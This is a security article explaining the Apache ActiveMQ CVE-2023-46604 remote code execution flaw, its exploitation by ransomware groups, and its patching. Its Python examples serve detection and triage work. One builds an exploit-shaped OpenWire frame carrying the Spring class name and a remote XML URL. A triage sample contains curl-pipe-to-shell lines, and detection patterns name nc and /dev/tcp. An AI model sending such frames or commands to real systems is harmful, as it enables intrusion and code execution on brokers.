CVE-2023-46604 Explained: Apache ActiveMQ Remote Code Execution (CVSS 10.0)
A CVSS 10.0 unauthenticated remote code execution vulnerability in Apache ActiveMQ's OpenWire protocol. While unmarshalling an exception, the broker instantiates whatever Java class the attacker names, with an attacker-supplied string argument; public exploits turned this into code execution by pointing Spring at a remote XML configuration. Weaponised within days by ransomware groups, cryptominers, and nation-state actors.
CVE-2023-46604 is a CVSS 10.0 remote code execution vulnerability in Apache ActiveMQ, the widely deployed open-source message broker. The vulnerability exists in the OpenWire protocol, ActiveMQ's native binary wire protocol, served on the default port 61616. An unauthenticated attacker sends a crafted ExceptionResponse command whose exception field carries an arbitrary class name and a string argument; the broker's OpenWire unmarshaller instantiates that class via reflection without checking that it is actually a Throwable. Public exploits name Spring's ClassPathXmlApplicationContext and pass the URL of an attacker-hosted bean-definition XML, so the broker fetches the file over HTTP and instantiates whatever beans it declares (typically a ProcessBuilder running a shell command), executing arbitrary code with the broker process's privileges.
Apache published the advisory on October 27, 2023, alongside fixed releases. Exploitation by ransomware operators and cryptominers was confirmed within days. The attack requires only network access to port 61616 and delivers code execution with no authentication and no user interaction, a combination that earned it the maximum CVSS score.
How CVE-2023-46604 Works: OpenWire ExceptionResponse to Remote Code Execution
Apache ActiveMQ's OpenWire protocol carries binary commands whose fields are typed Java values. Several commands carry a Throwable field (ExceptionResponse is the one exploits use; ConnectionError has one too). OpenWire serialises a Throwable as the exception's class name plus its message string, and reconstructs it on receipt by instantiating the named class.
The vulnerability is in that reconstruction, BaseDataStreamMarshaller.createThrowable. It takes the class name and message straight from the wire, resolves the name with Class.forName and invokes the class's single-String constructor with the message, never checking that the result is a Throwable. Any class on the broker's classpath with a public String constructor can therefore be instantiated by an anonymous remote peer. The ActiveMQ distribution bundles Spring, whose ClassPathXmlApplicationContext(String) constructor treats its argument as the location of an XML bean-definition file: given an http:// URL it downloads the file and instantiates the beans it declares, including a java.lang.ProcessBuilder whose init-method starts an attacker-chosen command. The "message" string thus becomes a remote code-loading channel, and the code runs as the ActiveMQ broker process user. The fix in the patched releases adds a check that the resolved class is assignable to Throwable before it is instantiated.
Because the OpenWire port is the broker's primary protocol endpoint, meant to be reachable by every message producer and consumer, it is frequently internet-accessible. That makes the attack exploitable across the public internet with a single crafted binary command, sent before any authentication handshake has taken place.
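The two attacker-controlled strings are easy to see on the wire. The following is an added example (not ActiveMQ's code) that builds a loose-encoded OpenWire ExceptionResponse frame, parses it the way the broker's unmarshaller walks the fields, and flags frames whose "throwable" class is not an exception type or whose message is a URL. The frames, the RFC 5737 address 192.0.2.10 and the allowlist of legitimate exception packages are constructed for the example; the stack-trace fields that follow the message on a real frame are omitted. The Spring class name is the one public exploits used.

```python
import struct
from urllib.parse import urlparse

EXCEPTION_RESPONSE = 31  # OpenWire command type byte for ExceptionResponse

# Throwable classes a broker has legitimate reason to put on the wire. This
# allowlist is an assumption made for the example, not an ActiveMQ setting.
EXPECTED_THROWABLE_PREFIXES = (
    "java.lang.", "java.io.", "java.net.", "javax.jms.", "jakarta.jms.",
    "org.apache.activemq.",
)

# The class name public exploits placed in the throwable slot. Spring's
# ClassPathXmlApplicationContext(String) loads bean definitions from a URL.
SPRING_CONTEXT = "org.springframework.context.support.ClassPathXmlApplicationContext"


def _utf(s: str) -> bytes:
    """Java DataOutput.writeUTF: 2-byte big-endian length, then the bytes."""
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def build_exception_response(clazz: str, message: str) -> bytes:
    """Build a loose-encoded ExceptionResponse frame (constructed test input).

    Only the two strings after the fixed header come from the sender; the
    vulnerable broker handed exactly these two to
    Class.forName(clazz).getConstructor(String.class).newInstance(message).
    """
    body = bytes([EXCEPTION_RESPONSE])
    body += struct.pack(">i", 0)        # commandId
    body += b"\x00"                     # responseRequired = false
    body += struct.pack(">i", 0)        # correlationId
    body += b"\x01"                     # throwable is non-null
    body += b"\x01" + _utf(clazz)       # throwable class name (non-null string)
    body += b"\x01" + _utf(message)     # throwable message (non-null string)
    return struct.pack(">i", len(body)) + body


def parse_exception_response(frame: bytes):
    """Return (class_name, message) from an ExceptionResponse frame, or None
    for any other command type or a null throwable."""
    (size,) = struct.unpack(">i", frame[:4])
    body = frame[4:4 + size]
    if not body or body[0] != EXCEPTION_RESPONSE:
        return None
    off = 1 + 4 + 1 + 4                 # type, commandId, responseRequired, correlationId
    if body[off] == 0:                  # null throwable
        return None
    off += 1

    def read_string(pos):
        if body[pos] == 0:              # null string
            return None, pos + 1
        (n,) = struct.unpack(">H", body[pos + 1:pos + 3])
        pos += 3
        return body[pos:pos + n].decode("utf-8", "replace"), pos + n

    clazz, off = read_string(off)
    message, off = read_string(off)
    return clazz, message


def looks_like_url(s) -> bool:
    if not s:
        return False
    u = urlparse(s)
    return u.scheme in ("http", "https", "ftp", "file") and bool(u.netloc or u.path)


def assess_frame(frame: bytes) -> list:
    """Reasons this frame looks like a CVE-2023-46604 attempt; empty if benign."""
    parsed = parse_exception_response(frame)
    if parsed is None:
        return []
    clazz, message = parsed
    reasons = []
    if not (clazz or "").startswith(EXPECTED_THROWABLE_PREFIXES):
        reasons.append(f"non-exception class in throwable slot: {clazz}")
    if looks_like_url(message):
        reasons.append(f"URL in exception message: {message}")
    return reasons


# Constructed samples: a benign broker error and an exploit-shaped frame
# pointing at an RFC 5737 documentation address.
BENIGN = build_exception_response("javax.jms.JMSException", "Queue not found")
EXPLOIT_SHAPED = build_exception_response(SPRING_CONTEXT, "http://192.0.2.10/poc.xml")

if __name__ == "__main__":
    for name, frame in (("benign", BENIGN), ("exploit-shaped", EXPLOIT_SHAPED)):
        print(name, assess_frame(frame) or "ok")
```

The same two checks (unexpected class in the throwable slot, URL where a message should be) are what network signatures for this CVE key on; the class-name check is the more durable one, since an attacker can only choose classes already on the broker's classpath.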
Identify ActiveMQ brokers with port 61616 accessible
Scan for TCP port 61616. On connection the broker immediately sends an OpenWire WireFormatInfo command whose marshalled properties include ProviderName ("ActiveMQ") and ProviderVersion, so the service and exact version can be read without authenticating. Shodan and Censys index thousands of exposed ActiveMQ instances.
Send a crafted ExceptionResponse command
Send a single OpenWire ExceptionResponse whose throwable class name is a non-exception class with a String constructor and whose message is an attacker-controlled URL (public exploits used Spring's ClassPathXmlApplicationContext). No authentication handshake or session establishment is required.
Broker instantiates the named class and fetches the remote configuration
The OpenWire unmarshaller calls Class.forName on the supplied name and invokes its String constructor with the URL. With ClassPathXmlApplicationContext, that constructor downloads the attacker's XML over HTTP from inside the broker JVM.
Malicious bean definitions execute on the broker
Spring instantiates the beans declared in the downloaded XML, typically a java.lang.ProcessBuilder whose constructor arguments are a shell command and whose init-method is start, so the command runs as soon as the context is built. The code runs as the ActiveMQ service user: frequently root in containers and quick installs, and even a dedicated service account can read every message the broker holds.
Deploy ransomware, cryptominer, or backdoor
HelloKitty ransomware operators used initial access to deploy encryptors. Kinsing deployed cryptocurrency mining payloads. Other actors established persistent shells for later-stage operations.
Exploitation in the Wild: Ransomware and Cryptomining
CVE-2023-46604 was weaponised remarkably quickly. Rapid7 observed exploitation in customer environments within days of the advisory and attributed the resulting intrusions to HelloKitty, the ransomware group responsible for the CD Projekt Red breach, based on the ransom note and encryptor binaries matching the group's tooling. The observed encryptors targeted Windows hosts.
Kinsing, a prolific cryptomining threat actor known for targeting containerised Linux environments, also deployed cryptominer payloads via CVE-2023-46604. Nation-state actors were also observed in the exploitation wave, reflecting the attractiveness of message broker compromise for persistent internal network access.
ActiveMQ brokers are particularly high-value targets because they typically sit on network segments with broad connectivity — they must communicate with all applications that produce and consume messages, often spanning multiple tiers of the application stack. A compromised broker is a pivot point into the internal network, not just a single system compromise.
“Threat actors are actively exploiting a recently disclosed critical security flaw in Apache ActiveMQ to distribute HelloKitty ransomware on susceptible Windows systems.”
— SentinelOne Threat Intelligence, November 2023
Patching and Mitigating CVE-2023-46604
The fix is a version upgrade. The interim mitigation is firewall restriction of the OpenWire port.
Upgrade Apache ActiveMQ immediately
Patch to the first fixed release on your branch: 5.15.16, 5.16.7, 5.17.6 or 5.18.3 (or any later release). Verify the running version in the web console (http://broker:8161/admin), via the CLI with activemq --version, or from the activemq-client-<version>.jar name under the installation's lib/ directory. The ProviderVersion the broker reports in its OpenWire banner is a convenient remote check, but it is self-reported, so confirm against the installed files.
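A remote version check can be built from the banner mentioned above. The following is an added example, not part of the page or of ActiveMQ: it parses a WireFormatInfo frame (magic, OpenWire version, then a primitive map of properties) and maps the reported ProviderVersion onto the advisory's affected ranges. The banner bytes are constructed here so the code runs offline; against a live broker the same bytes would be read from the socket right after connecting to port 61616.

```python
import re
import struct

WIREFORMAT_INFO = 1          # OpenWire command type of the banner the broker sends first
MAGIC = b"ActiveMQ"
# Type tags used inside an OpenWire primitive map (MarshallingSupport)
BOOLEAN_TYPE, INTEGER_TYPE, LONG_TYPE, STRING_TYPE = 1, 5, 6, 9

# First fixed patch level on each affected 5.x branch, per the Apache advisory
FIXED_PATCH = {15: 16, 16: 7, 17: 6, 18: 3}


def _utf(s: str) -> bytes:
    """Java DataOutput.writeUTF: 2-byte length prefix, then the bytes."""
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def build_wireformat_info(props: dict, openwire_version: int = 12) -> bytes:
    """Constructed WireFormatInfo banner in loose encoding, for testing the parser."""
    pmap = struct.pack(">i", len(props))
    for key, value in props.items():
        pmap += _utf(key)
        if isinstance(value, bool):              # bool before int: True is an int
            pmap += bytes([BOOLEAN_TYPE, int(value)])
        elif isinstance(value, int):
            pmap += bytes([LONG_TYPE]) + struct.pack(">q", value)
        else:
            pmap += bytes([STRING_TYPE]) + _utf(value)
    body = bytes([WIREFORMAT_INFO]) + MAGIC + struct.pack(">i", openwire_version)
    body += b"\x01" + struct.pack(">i", len(pmap)) + pmap   # non-null byte sequence
    return struct.pack(">i", len(body)) + body


def parse_wireformat_info(frame: bytes) -> dict:
    """Extract the marshalled properties from a broker's WireFormatInfo frame."""
    (size,) = struct.unpack(">i", frame[:4])
    body = frame[4:4 + size]
    if body[:1] != bytes([WIREFORMAT_INFO]) or body[1:9] != MAGIC:
        raise ValueError("not an OpenWire WireFormatInfo frame")
    (wire_version,) = struct.unpack(">i", body[9:13])
    props = {"OpenWireVersion": wire_version}
    if body[13] == 0:                            # null property map
        return props
    (plen,) = struct.unpack(">i", body[14:18])
    pmap = body[18:18 + plen]
    (count,) = struct.unpack(">i", pmap[:4])
    off = 4
    for _ in range(count):
        (klen,) = struct.unpack(">H", pmap[off:off + 2]); off += 2
        key = pmap[off:off + klen].decode("utf-8"); off += klen
        tag = pmap[off]; off += 1
        if tag == BOOLEAN_TYPE:
            value = bool(pmap[off]); off += 1
        elif tag == INTEGER_TYPE:
            (value,) = struct.unpack(">i", pmap[off:off + 4]); off += 4
        elif tag == LONG_TYPE:
            (value,) = struct.unpack(">q", pmap[off:off + 8]); off += 8
        elif tag == STRING_TYPE:
            (slen,) = struct.unpack(">H", pmap[off:off + 2]); off += 2
            value = pmap[off:off + slen].decode("utf-8"); off += slen
        else:
            raise ValueError(f"unhandled primitive type {tag} for key {key}")
        props[key] = value
    return props


def is_vulnerable(version: str) -> bool:
    """True if a reported ActiveMQ version falls in the advisory's affected ranges."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if major < 5:
        return True                     # "before 5.15.16" covers every older release
    if major > 5 or minor > 18:
        return False                    # outside the advisory's 5.x ranges
    if minor < 15:
        return True
    return patch < FIXED_PATCH[minor]


def assess_banner(frame: bytes) -> str:
    props = parse_wireformat_info(frame)
    version = props.get("ProviderVersion")
    if props.get("ProviderName") != "ActiveMQ" or not version:
        return "unknown"
    return "vulnerable" if is_vulnerable(version) else "patched"


# Constructed banner for an unpatched 5.18.x broker
SAMPLE_BANNER = build_wireformat_info({
    "ProviderName": "ActiveMQ", "ProviderVersion": "5.18.2", "PlatformDetails": "Java",
    "StackTraceEnabled": True, "TightEncodingEnabled": True, "MaxFrameSize": 104857600,
})

if __name__ == "__main__":
    print(parse_wireformat_info(SAMPLE_BANNER))
    print(assess_banner(SAMPLE_BANNER))
```

A "patched" verdict from the banner only means the broker claims a fixed version; a "vulnerable" verdict on a host you own should be confirmed from the jar names on disk before anyone argues about it.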
Restrict access to port 61616 at the network level
Allow only the application servers that legitimately produce or consume messages to reach port 61616, and block everything else at the firewall; where the broker has more than one interface, also bind the openwire transportConnector in conf/activemq.xml to the internal address rather than 0.0.0.0. This removes the attack surface from untrusted networks even on unpatched versions, but it is a stopgap: any host that can still reach the port can still exploit it, so patching remains necessary.
Restrict port 8161 (web console) to trusted networks
The ActiveMQ web administration console on port 8161 provides additional configuration and management capabilities. It should never be internet-accessible. Apply the same network-level restriction as for port 61616.
Investigate systems that ran unpatched, internet-exposed ActiveMQ
Any internet-exposed ActiveMQ instance that ran a vulnerable version should be treated as potentially compromised, and the investigation should cover the whole exposure window, not just the days after disclosure. Look for child processes of the ActiveMQ JVM (a broker has no reason to spawn shells, curl or wget), new cron jobs or systemd units, modified startup scripts, and outbound connections from the broker to hosts it has no business contacting. The exploit itself requires the JVM to fetch the attacker's XML over HTTP, so egress and proxy logs from that period are worth pulling as well.
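The host-side checks above can be scripted against the usual triage captures. This is an added example (not from the page or from ActiveMQ) that takes `ps -eo pid,ppid,user,args`, crontab and `ss -tnp` output, finds the broker JVM, walks its process tree for shells, downloaders or anything running from /tmp, flags cron entries that fetch and pipe to a shell, and lists established connections from the JVM and its children that are not inbound to the broker's own ports. All three samples are constructed to look like a compromised host; 192.0.2.10 and 198.51.100.7 are documentation addresses.

```python
import re

# Constructed `ps -eo pid,ppid,user,args` output from a hypothetical compromised host
PS_SAMPLE = """\
    PID    PPID USER     COMMAND
      1       0 root     /sbin/init
    842       1 activemq /usr/lib/jvm/java-17/bin/java -Xms64M -Xmx1G org.apache.activemq.console.Main start
    955       1 root     /usr/sbin/cron
   1203     842 activemq /bin/sh -c curl -s http://192.0.2.10/setup.sh | sh
   1207    1203 activemq sh
   1211    1207 activemq /tmp/.cache/payload
"""

# Constructed /etc/crontab content
CRON_SAMPLE = """\
# m h dom mon dow user command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * * activemq curl -s http://192.0.2.10/c.sh | sh
"""

# Constructed `ss -tnp` output
SS_SAMPLE = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port  Process
ESTAB 0      0      10.0.0.5:61616     10.0.0.21:50412    users:(("java",pid=842,fd=120))
ESTAB 0      0      10.0.0.5:43522     192.0.2.10:80      users:(("java",pid=842,fd=131))
ESTAB 0      0      10.0.0.5:43530     198.51.100.7:4444  users:(("payload",pid=1211,fd=3))
"""

SHELL_OR_DOWNLOADER = re.compile(r"(^|/)(sh|bash|dash|curl|wget|python\d*|perl|nc|ncat)(\s|$)")
CRON_FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b|base64\s+(-d|--decode)|/dev/tcp/")
BROKER_LISTEN_PORTS = {61616, 8161}   # inbound client and console ports; anything else is egress


def parse_ps(text: str) -> dict:
    """pid -> (ppid, user, args); the first line is the header."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) == 4:
            procs[int(parts[0])] = (int(parts[1]), parts[2], parts[3])
    return procs


def find_broker_pid(procs: dict):
    for pid, (_, _, args) in procs.items():
        if "org.apache.activemq.console.Main" in args:
            return pid
    return None


def descendants(procs: dict, root: int) -> list:
    """Every process below root in the parent/child tree."""
    found, stack = [], [root]
    while stack:
        parent = stack.pop()
        for pid, (ppid, _, _) in sorted(procs.items()):
            if ppid == parent:
                found.append(pid)
                stack.append(pid)
    return found


def suspicious_children(procs: dict, broker_pid: int) -> list:
    """Descendants of the JVM that are shells, downloaders or run from /tmp."""
    return [(pid, procs[pid][2]) for pid in descendants(procs, broker_pid)
            if SHELL_OR_DOWNLOADER.search(procs[pid][2]) or procs[pid][2].startswith("/tmp/")]


def suspicious_cron(cron_text: str) -> list:
    return [line for line in cron_text.splitlines()
            if line and not line.startswith("#") and CRON_FETCH_AND_RUN.search(line)]


def egress_from_pids(ss_text: str, pids: set) -> list:
    """(pid, peer) for established connections owned by pids that are not inbound to the broker."""
    hits = []
    for line in ss_text.splitlines()[1:]:
        fields = line.split()
        m = re.search(r"pid=(\d+)", line)
        if len(fields) < 6 or not m:
            continue
        local_port = int(fields[3].rsplit(":", 1)[1])
        if int(m.group(1)) in pids and local_port not in BROKER_LISTEN_PORTS:
            hits.append((int(m.group(1)), fields[4]))
    return hits


def triage(ps_text: str, cron_text: str, ss_text: str) -> dict:
    procs = parse_ps(ps_text)
    broker = find_broker_pid(procs)
    children = suspicious_children(procs, broker) if broker else []
    watched = {broker, *(pid for pid, _ in children)} if broker else set()
    return {"broker_pid": broker, "children": children,
            "cron": suspicious_cron(cron_text), "egress": egress_from_pids(ss_text, watched)}


if __name__ == "__main__":
    for key, value in triage(PS_SAMPLE, CRON_SAMPLE, SS_SAMPLE).items():
        print(key, value)
```

Run it against captures taken before any remediation, since restarting the broker destroys the process tree that ties the payload back to the JVM; the cron and connection findings survive a restart, the parent/child evidence does not.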
The bottom line
CVE-2023-46604 is the consequence of exposing a binary protocol with unsafe remote class loading to an untrusted network. Apache ActiveMQ's OpenWire port was designed for application-to-broker communication in trusted internal environments. When organisations expose it to the internet — even accidentally — a CVSS 10.0 attack surface results.
The exploitation timeline is instructive: from advisory to confirmed ransomware deployment, less than one week. Security teams with vulnerable internet-exposed ActiveMQ instances had a very short window to patch before active attacks began. If you run ActiveMQ and did not patch within that window, investigation is the correct first step — not just patching. The patched broker on a previously compromised host still has whatever the attacker installed during their access window.
Frequently asked questions
What is CVE-2023-46604?
CVE-2023-46604 is a CVSS 10.0 vulnerability in Apache ActiveMQ. While unmarshalling the exception carried in a crafted ExceptionResponse command, the OpenWire protocol handler instantiates whatever class the message names, passing it an attacker-supplied string; with Spring's ClassPathXmlApplicationContext that string is the URL of a remote bean-definition file, giving arbitrary Java code execution on the broker host without any authentication. Port 61616 (the default OpenWire port) is the attack surface.
Which versions of Apache ActiveMQ are affected?
Apache ActiveMQ 5.18.0 through 5.18.2, 5.17.0 through 5.17.5, 5.16.0 through 5.16.6, and every release before 5.15.16 are affected; the Apache ActiveMQ Legacy OpenWire Module is affected in the same ranges. The fixed releases are 5.15.16, 5.16.7, 5.17.6 and 5.18.3.
Was CVE-2023-46604 exploited in the wild?
Yes, rapidly. Rapid7 observed exploitation within days of the advisory and linked the intrusions to HelloKitty ransomware operators using CVE-2023-46604 for initial access. Kinsing, a cryptomining threat actor, also weaponised the vulnerability. CISA added it to the Known Exploited Vulnerabilities catalog on November 2, 2023.
Why is Apache ActiveMQ exposed on port 61616?
Port 61616 is the default OpenWire broker port and is often internet-accessible because ActiveMQ is deployed as a message bus between applications — sometimes requiring external connectivity. Many deployments leave the port open without network-level restrictions, making CVE-2023-46604 an attractive mass-exploitation target.
How do I fix CVE-2023-46604?
Upgrade Apache ActiveMQ to 5.15.16, 5.16.7, 5.17.6 or 5.18.3 (or later), depending on your version branch. If upgrading is not immediately possible, block inbound access to TCP port 61616 at the firewall for all untrusted networks. The broker should only be reachable from application servers that legitimately need to communicate with it, and the web console on port 8161 should be restricted the same way.
Sources & references
- NVD
- Apache ActiveMQ Security Advisory
- Rapid7 Attack Analysis: CVE-2023-46604
- SentinelOne — HelloKitty Ransomware Exploiting CVE-2023-46604
- CISA Known Exploited Vulnerabilities Catalog
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.
